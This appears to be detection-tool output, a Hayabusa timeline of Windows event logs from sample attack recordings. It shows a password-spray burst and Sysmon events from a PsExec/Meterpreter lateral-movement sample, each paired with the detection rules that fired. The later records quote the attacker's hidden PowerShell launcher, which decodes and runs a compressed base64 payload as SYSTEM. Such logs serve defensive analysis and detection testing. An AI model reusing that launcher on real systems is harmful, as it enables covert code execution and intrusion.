DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP 
Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 
Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:00.320 
+09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bking/edygert/drook/cragoso/ssims/jlake/jorchilles/bgreenwood/mdouglas/baker/smisenar/dmashburn/bgalbraith/cspizor IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- 2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP 
Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 
Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 
365ABB72-AF8B-5CC8-0000-0010AC1B1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object 
IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/
